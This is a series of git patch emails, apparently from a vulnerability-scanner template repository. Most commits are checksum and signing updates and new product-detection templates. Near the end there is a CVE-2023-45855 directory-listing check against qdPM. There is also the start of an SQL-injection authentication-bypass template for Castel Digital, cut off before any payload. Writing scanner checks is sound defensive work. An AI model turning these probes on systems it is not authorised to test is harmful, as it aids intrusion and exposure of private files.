From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 08:42:48 +0000 Subject: [PATCH 0881/1768] Auto Template Signing [Mon May 13 08:42:48 UTC 2024] :robot: --- http/honeypot/tpot-honeypot-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/honeypot/tpot-honeypot-detect.yaml b/http/honeypot/tpot-honeypot-detect.yaml index a999be727a..12525a4c18 100644 --- a/http/honeypot/tpot-honeypot-detect.yaml +++ b/http/honeypot/tpot-honeypot-detect.yaml @@ -28,3 +28,4 @@ http: - type: status status: - 200 +# digest: 4b0a0048304602210092e8c105082a6686c4a5241f7fe90b7fe5f5f14e5e65ee874e138dd69c1462b3022100d38690efa1cc7e6e88c421640d5647ef94b715ac36a843d633116ae915c69d6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 1b99086e88de6b9c60897e0b2d9f5c1d0042d788 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 14:13:55 +0530 Subject: [PATCH 0882/1768] metadata update --- http/technologies/apache/apache-answer-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/technologies/apache/apache-answer-detect.yaml b/http/technologies/apache/apache-answer-detect.yaml index c9a4562f57..12e0c76523 100644 --- a/http/technologies/apache/apache-answer-detect.yaml +++ b/http/technologies/apache/apache-answer-detect.yaml @@ -9,8 +9,8 @@ info: reference: - https://answer.apache.org/ metadata: - shodan-query: html:"Apache Answer" - fofa-query: body="Apache Answer" + shodan-query: http.favicon.hash:523757057 + fofa-query: icon_hash="523757057" verified: true max-request: 1 tags: detect,tech,apache From 8dc7a1cf21920e55212d5834ba6950cf0d31194a Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 08:45:12 +0000 Subject: [PATCH 0883/1768] Auto Generated New Template Addition List [Mon May 13 08:45:12 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e39e76e6d8..507ffbb7fd 100644 --- a/.new-additions +++ b/.new-additions @@ -13,3 +13,4 @@ http/misconfiguration/unigui-server-monitor-exposure.yaml http/technologies/craftercms-detect.yaml http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml +http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml From 4249a0dbdd9ecd31b5ae329b068d15db753226f1 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 08:45:23 +0000 Subject: [PATCH 0884/1768] Auto Generated Templates Checksum [Mon May 13 08:45:23 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6bf43d12bd..f4a1a438ce 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5083,7 +5083,7 @@ http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbb http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25 http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa http/honeypot/snare-honeypot-detect.yaml:b63d27a24618602947f861b69eec3ceee8c08bd5 -http/honeypot/tpot-honeypot-detect.yaml:05ed4e7cc965374521c470e85244357e7393df96 +http/honeypot/tpot-honeypot-detect.yaml:d6bba366446a11da0938639a63c137fff9baf522 http/iot/ampguard-wifi-setup.yaml:3fdb76a85fa7376b4ddef9a2af7f4cfadd9db2fb http/iot/apc-ups-login.yaml:915c40c7c4e581a0636cc99d6d7ac0582f7da117 http/iot/automation-direct.yaml:9b578eb3fea63e67a0c939c9cce372e94ad3de19 @@ -7172,6 +7172,7 @@ http/technologies/wordpress/plugins/wps-hide-login.yaml:49e23dfebb88ab4c3822f56d http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:74b65c6c5ca927a3cc48713f2e12af3315585a02 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b585238fc372f9d7131fb53c9bde96f0c8224553 +http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cc594840e6c1eb49fa2bbcc0c531cb1d6e6ed16a http/technologies/wordpress-detect.yaml:cffcda2750ea67cb0bfe228180718a5071f9e031 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f http/technologies/wso2-products-detect.yaml:810c03f8a2986fd7939b83bca35b9a6f95196a63 @@ -8514,7 +8515,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:23b1af453d65469d014b1b27b0f441f2048fa275 +templates-checksum.txt:ff1d3000b3eb53a7ecdce199268892f1f7334f14 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0d1b5506aac856090be193b1d13cf4004b907ffd Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 08:45:58 +0000 Subject: [PATCH 0885/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 05cd350984..e8d3632b80 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -18,6 +18,7 @@ on: - 'http/technologies/craftercms-detect.yaml' - 'http/technologies/statamic-detect.yaml' - 'http/technologies/tinyproxy-detect.yaml' + - 'http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From a8a2c05530783c003d3a35757e30f550eecbdc00 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 08:46:59 +0000 Subject: [PATCH 0886/1768] Auto Template Signing [Mon May 13 08:46:59 UTC 2024] :robot: --- http/misconfiguration/microsoft/ms-exchange-local-domain.yaml | 2 +- http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml index 602a0d8de5..6d23425582 100644 --- a/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml +++ b/http/misconfiguration/microsoft/ms-exchange-local-domain.yaml @@ -42,4 +42,4 @@ http: - type: kval kval: - x_calculatedbetarget -# digest: 490a0046304402205f025e53bc125c91f858165a0912ddc8edd46b6b2370f2ef02cad79aa821edb002200f38bd6dc2bf6d5add1b15173de97999b01080b7297cc21eeee3206f3aed7a2d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210097f4e7ab5764e0db53da23c04266b429b571322e42b0fad09912690d7b6b6fdd02202724f2e0e85ee16b159f4fea95e7e21447c003fae169973816932c90f362a2c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml index adae776bda..802b5c5f54 100644 --- a/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml +++ b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml @@ -34,3 +34,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100c4459c83f851208e488f0f5bbeba4f40f1c2b14a227b689dba16c4c452d198b702206c63a5349ee0a6a1c5ba1f9065886fc44766c900aa9058cdda45ad713aa87241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From bbfb734196355bfdc2d50c95ea25af8b6534ce72 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 12:28:22 +0330 Subject: [PATCH 0887/1768] Update umami-panel.yaml --- http/exposed-panels/umami-panel.yaml | 19 ++++++++++++++++++- 1 file changed, 18 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index 8f4d13b1de..1087d0f2b1 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -15,6 +15,8 @@ info: shodan-query: http.favicon.hash:-130447705 tags: panel,umami,login,detect +flow: http(1) && http(2) + http: - method: GET path: @@ -35,4 +37,19 @@ http: - type: dsl dsl: - "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))" -# digest: 490a00463044022029194c0dffdde61fa306eed121e4193ed634878016007b77b6f7b55c3f9de11102204cddda016f7544b4b498c462c250522872b003cfeb36e329adecf572b1516411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +http: + - method: GET + path: + - "{{BaseURL}}/~404" + + matchers: + - type: status + status: + - 404 + + extractors: + - type: regex + part: body + regex: + - 'v(?P<version>\d+\.\d+\.\d+)' From 873ba5e4f3a741127d8690ce084cfa201ce31d66 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <m.a.dehghani609@gmail.com> Date: Mon, 13 May 2024 12:37:35 +0330 Subject: [PATCH 0888/1768] Update umami-panel.yaml --- http/exposed-panels/umami-panel.yaml | 6 ------ 1 file changed, 6 deletions(-) diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index 1087d0f2b1..a7426f180e 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -38,16 +38,10 @@ http: dsl: - "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))" -http: - method: GET path: - "{{BaseURL}}/~404" - matchers: - - type: status - status: - - 404 - extractors: - type: regex part: body From 4ebeee061759bb9ba36a99b0dc9abaf6cf5ffa0d Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 09:08:32 +0000 Subject: [PATCH 0889/1768] Auto Generated New Template Addition List [Mon May 13 09:08:32 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 507ffbb7fd..10db97c58d 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ http/honeypot/tpot-honeypot-detect.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml +http/technologies/apache/apache-answer-detect.yaml http/technologies/craftercms-detect.yaml http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml From d390bdd363ea609d893c157a3077a74a8b385b1c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 09:08:38 +0000 Subject: [PATCH 0890/1768] Auto Generated Templates Checksum [Mon May 13 09:08:38 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f4a1a438ce..c024fe839d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5510,7 +5510,7 @@ http/misconfiguration/linktap-gateway-exposure.yaml:8445d5ca649bd0696ca61bb561b3 http/misconfiguration/locust-exposure.yaml:a05194cd9aa186052bbae31223d52c0ea9ab3b68 http/misconfiguration/lvm-exporter-metrics.yaml:f1cdf9f009abc6debe3fc3c58740d68b00322c64 http/misconfiguration/manage-engine-ad-search.yaml:e58d8b0d6b16f99046807fb55b73df8dc558bd2d -http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:b9cb06e3e9760001311c8864648243fcf1bec38b +http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:bc55398c10b87bc6a5c507b4710e3462b264f935 http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac3db72af84f34e3 http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d http/misconfiguration/misconfigured-docker.yaml:ca18899f575d3f7df82e3a33e2a9b4b0f75582ef @@ -6576,6 +6576,7 @@ http/technologies/ambassador-edge-stack-detect.yaml:fcb8fa46e689fb4d35bb7fbd4be8 http/technologies/angular-detect.yaml:7719617c08923ab10058ecbc5d9fe19ff7195d77 http/technologies/ansible-awx-detect.yaml:44114d7cf04fcf41b49e86fee243b0c5ecc2ed2b http/technologies/apache/airflow-detect.yaml:36837eb295b1c7ffced3d9864087d6dac52969dd +http/technologies/apache/apache-answer-detect.yaml:00f468b9673de4e23c4afa0e40db25ebee4b0f96 http/technologies/apache/apache-axis-detect.yaml:55d59a4142e61ae3ead1bf03594767f59cac83dd http/technologies/apache/apache-cocoon-detect.yaml:773bd2977ddbb3403acfcd0f8e4cf10c81b84495 http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa249507 @@ -7172,7 +7173,7 @@ http/technologies/wordpress/plugins/wps-hide-login.yaml:49e23dfebb88ab4c3822f56d http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:74b65c6c5ca927a3cc48713f2e12af3315585a02 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b585238fc372f9d7131fb53c9bde96f0c8224553 -http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cc594840e6c1eb49fa2bbcc0c531cb1d6e6ed16a +http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:823e6d8fb3f52400cd29e17aa6e9d9e5215fb639 http/technologies/wordpress-detect.yaml:cffcda2750ea67cb0bfe228180718a5071f9e031 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f http/technologies/wso2-products-detect.yaml:810c03f8a2986fd7939b83bca35b9a6f95196a63 @@ -8515,7 +8516,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ff1d3000b3eb53a7ecdce199268892f1f7334f14 +templates-checksum.txt:6f896504cd0d198a4e77b3af1e34b9a542b1a176 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From eafcf06760ac3db05b750397c5a08edead3e7ff5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 13 May 2024 09:09:15 +0000 Subject: [PATCH 0891/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e8d3632b80..ad1014d6de 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -15,6 +15,7 @@ on: - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' + - 'http/technologies/apache/apache-answer-detect.yaml' - 'http/technologies/craftercms-detect.yaml' - 'http/technologies/statamic-detect.yaml' - 'http/technologies/tinyproxy-detect.yaml' From b15c5f1e3ee1726eaeda652045e04a4f4375e215 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 09:10:18 +0000 Subject: [PATCH 0892/1768] Auto Generated Templates Checksum [Mon May 13 09:10:18 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c024fe839d..bfe034ce43 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4030,7 +4030,7 @@ http/exposed-panels/mailhog-panel.yaml:086f46cbe44037b7a0e98e2de15e3b244478c498 http/exposed-panels/mailwatch-login.yaml:5806b40c7aba9a02c1df2d3984844a3d0fbda20c http/exposed-panels/maltrail-panel.yaml:e64bf45e9330011747c012809705e894700e308b http/exposed-panels/mantisbt-panel.yaml:a79ef369723d43f4d20f4d94abe7bbabec3afa04 -http/exposed-panels/matomo-login-portal.yaml:39af2391e82e09f349ad6ee47898d5604fa4ad25 +http/exposed-panels/matomo-panel.yaml:83b26c8dc76d00f712f199f43099c80dcad3d208 http/exposed-panels/mautic-crm-panel.yaml:53a7b87d599c64c95672e30524f3c8bfe053160d http/exposed-panels/memos-panel.yaml:889e1696bded69cb5833dc1cd22b44ac49318773 http/exposed-panels/meshcentral-login.yaml:6112dd7a01bf42c06b47b029f3aafb08d85f7ee0 @@ -8516,7 +8516,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6f896504cd0d198a4e77b3af1e34b9a542b1a176 +templates-checksum.txt:cad97fba8e3dd4acd41ee77c82b8b3e7d5dc5d8c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 38e146bf916d84e5a4d595e8d9d19e3c68b27bb0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 09:10:19 +0000 Subject: [PATCH 0893/1768] Auto Template Signing [Mon May 13 09:10:19 UTC 2024] :robot: --- http/technologies/apache/apache-answer-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/apache/apache-answer-detect.yaml b/http/technologies/apache/apache-answer-detect.yaml index 12e0c76523..47afbcc440 100644 --- a/http/technologies/apache/apache-answer-detect.yaml +++ b/http/technologies/apache/apache-answer-detect.yaml @@ -42,3 +42,4 @@ http: name: version regex: - '"version":"([^"]+)"' +# digest: 4b0a00483046022100e8b6cf0b4a146a98e2ea5be56454a84686c4de20f506b9c297c3b34b02905d930221008eb6c97ad0a6509d1e883e58004163afbfe3453aa32e30608e988f5e8df25d2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 2125fe9dced44a63453cf1c14d0a3bab5f8a5206 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 09:11:11 +0000 Subject: [PATCH 0894/1768] Auto Generated Templates Checksum [Mon May 13 09:11:11 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index bfe034ce43..910422913e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -210,7 +210,7 @@ dast/vulnerabilities/ssti/reflection-ssti.yaml:f88426f514ecbe514a5b988b2e826d967 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 dast/vulnerabilities/xss/reflected-xss.yaml:1faff32e9ad4bb73f0476c526f9b6ef6d5a51757 dast/vulnerabilities/xxe/generic-xxe.yaml:54b04c0c3b8d50d6305ed48ac7997f1aeeea426d -dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 +dns/azure-takeover-detection.yaml:aa7033fb366a4fb11dc5b575f20908007cda26f2 dns/bimi-detect.yaml:49b1f8b7289261ba3926483a41fa213f921248f2 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 @@ -6576,7 +6576,7 @@ http/technologies/ambassador-edge-stack-detect.yaml:fcb8fa46e689fb4d35bb7fbd4be8 http/technologies/angular-detect.yaml:7719617c08923ab10058ecbc5d9fe19ff7195d77 http/technologies/ansible-awx-detect.yaml:44114d7cf04fcf41b49e86fee243b0c5ecc2ed2b http/technologies/apache/airflow-detect.yaml:36837eb295b1c7ffced3d9864087d6dac52969dd -http/technologies/apache/apache-answer-detect.yaml:00f468b9673de4e23c4afa0e40db25ebee4b0f96 +http/technologies/apache/apache-answer-detect.yaml:0edd4322267dfd814e651abe28b611f686680736 http/technologies/apache/apache-axis-detect.yaml:55d59a4142e61ae3ead1bf03594767f59cac83dd http/technologies/apache/apache-cocoon-detect.yaml:773bd2977ddbb3403acfcd0f8e4cf10c81b84495 http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa249507 @@ -8516,7 +8516,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:cad97fba8e3dd4acd41ee77c82b8b3e7d5dc5d8c +templates-checksum.txt:11807a89775af584dc3410d74f2576e8276bde19 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From fc23e21aabb1f48b86b8dc8a444beeabe492a668 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 13 May 2024 09:12:58 +0000 Subject: [PATCH 0895/1768] Auto Template Signing [Mon May 13 09:12:58 UTC 2024] :robot: --- dns/azure-takeover-detection.yaml | 1 + http/exposed-panels/matomo-panel.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index fdddd8cff0..a3bf3add6e 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -51,3 +51,4 @@ dns: - type: dsl dsl: - cname +# digest: 4b0a00483046022100d68568731abdd8cfc97f8e47d3886209656605e7c73bfe62944a9d0d440bdd0d0221009fbd2c17dbd3f8faf9eae5e17223431a603a59249c6d151b36f22bbd4723ad6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/matomo-panel.yaml b/http/exposed-panels/matomo-panel.yaml index 840ab0a12a..0fe7fd23af 100644 --- a/http/exposed-panels/matomo-panel.yaml +++ b/http/exposed-panels/matomo-panel.yaml @@ -43,3 +43,4 @@ http: - type: dsl dsl: - "status_code==200 && (\"-2023266783\" == mmh3(base64_py(body)))" +# digest: 4a0a0047304502205217330d775233ed1853dd31211905403034b6f585c3e2b9623fcc9a8b79b5b0022100b9b40d58f73228425c1491bdce70eb1a39d2e087072d50864dad2f181de17cbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 450cfb26d042363666dcf1e1f23efee94899c867 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 14:57:39 +0330 Subject: [PATCH 0896/1768] Add n8n-panel.yaml --- http/exposed-panels/n8n-panel.yaml | 34 ++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/exposed-panels/n8n-panel.yaml diff --git a/http/exposed-panels/n8n-panel.yaml b/http/exposed-panels/n8n-panel.yaml new file mode 100644 index 0000000000..53a0fbd748 --- /dev/null +++ b/http/exposed-panels/n8n-panel.yaml @@ -0,0 +1,34 @@ +id: n8n-panel + +info: + name: n8n Panel - Detect + author: userdehghani + severity: info + description: | + The worlds most popular workflow automation platform for technical teams + reference: + - https://n8n.io/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-831756631 + tags: panel,n8n,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/signin" + - "{{BaseURL}}/favicon.ico" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - '<title>n8n.io' + case-insensitive: true + + - type: dsl + dsl: + - "status_code==200 && (\"-831756631\" == mmh3(base64_py(body)))" From be89fd721c2bef40184f399fbfc69f586025541d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Mon, 13 May 2024 17:32:41 +0530 Subject: [PATCH 0897/1768] Create CVE-2023-45855.yaml --- http/cves/2023/CVE-2023-45855.yaml | 44 ++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 http/cves/2023/CVE-2023-45855.yaml diff --git a/http/cves/2023/CVE-2023-45855.yaml b/http/cves/2023/CVE-2023-45855.yaml new file mode 100644 index 0000000000..d3c814f700 --- /dev/null +++ b/http/cves/2023/CVE-2023-45855.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-45855 + +info: + name: qdPM 9.2 Directory Traversal Vulnerability + author: DhiyaneshDk + severity: high + description: qdPM 9.2 allows Directory Traversal to list files and directories by navigating to the /uploads URI. + impact: | + Successful exploitation could allow an attacker to read sensitive files on the server. + remediation: | + Upgrade qdPM to a non-vulnerable version to mitigate the directory traversal vulnerability. + reference: + - https://qdpm.net + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-45855 + cwe-id: CWE-22 + epss-score: 0.00087 + epss-percentile: 0.35946 + cpe: cpe:2.3:a:qdpm:qdpm:9.2:*:*:*:*:*:*:* + metadata: + vendor: qdpm + product: qdpm + shodan-query: http.favicon.hash:762074255 + tags: cve,cve2023,qdpm,lfi,listing + +http: + - method: GET + path: + - "{{BaseURL}}/uploads/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "users" + - "attachments" + condition: and + + - type: status + status: + - 200 From df1b08e56a6237d14344e22ea46ebe5cd9f39e71 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 16:13:55 +0330 Subject: [PATCH 0898/1768] Add meilisearch-detect.yaml --- http/technologies/meilisearch-detec.yaml | 32 ++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/technologies/meilisearch-detec.yaml diff --git a/http/technologies/meilisearch-detec.yaml b/http/technologies/meilisearch-detec.yaml new file mode 100644 index 0000000000..d9124a1b89 --- /dev/null +++ b/http/technologies/meilisearch-detec.yaml @@ -0,0 +1,32 @@ +id: meilisearch-detect + +info: + name: Meilisearch Detect + author: userdehghani + severity: info + description: | + an open-source, blazingly fast, and hyper-relevant search engine that will improve your search experience. + reference: + - https://www.meilisearch.com/ + metadata: + verified: true + max-request: 1 + tags: meilisearch,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "application/json")' + + - type: word + part: body + encoding: hex + words: + - "7B22737461747573223A224D65696C697365617263682069732072756E6E696E67227D" \ No newline at end of file From 04d0aa1074aedb99a56148409b98067a2fb7a50a Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <m.a.dehghani609@gmail.com> Date: Mon, 13 May 2024 16:16:22 +0330 Subject: [PATCH 0899/1768] test --- http/technologies/meilisearch-detec.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/meilisearch-detec.yaml b/http/technologies/meilisearch-detec.yaml index d9124a1b89..66d5261606 100644 --- a/http/technologies/meilisearch-detec.yaml +++ b/http/technologies/meilisearch-detec.yaml @@ -29,4 +29,4 @@ http: part: body encoding: hex words: - - "7B22737461747573223A224D65696C697365617263682069732072756E6E696E67227D" \ No newline at end of file + - "7B22737461747573223A224D65696C697365617263682069732072756E6E696E67227D" From 519d77e5d4ae04165ed8e148966766af8b450d73 Mon Sep 17 00:00:00 2001 From: Kazgangap <halilkirazkaya@yandex.com> Date: Mon, 13 May 2024 17:23:28 +0300 Subject: [PATCH 0900/1768] add castel login panel sqli --- .../other/castel-digital-sqli.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/vulnerabilities/other/castel-digital-sqli.yaml diff --git a/http/vulnerabilities/other/castel-digital-sqli.yaml b/http/vulnerabilities/other/castel-digital-sqli.yaml new file mode 100644 index 0000000000..f171d74341 --- /dev/null +++ b/http/vulnerabilities/other/castel-digital-sqli.yaml @@ -0,0 +1,34 @@ +id: castel-digital-sqli + +info: + name: Castel Digital Authentication Bypass + author: Kazgangap + severity: high + description: SQL Injection vulnerability in Castel Digital login forms. + reference: + - https://www.casteldigital.com.br/ + - https://cxsecurity.com/issue/WLB-2024050032 + metadata: + google-query: "Castel Digital" + tags: sqli,webapps + + +http: + - raw: + - | + POST /restrito/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + 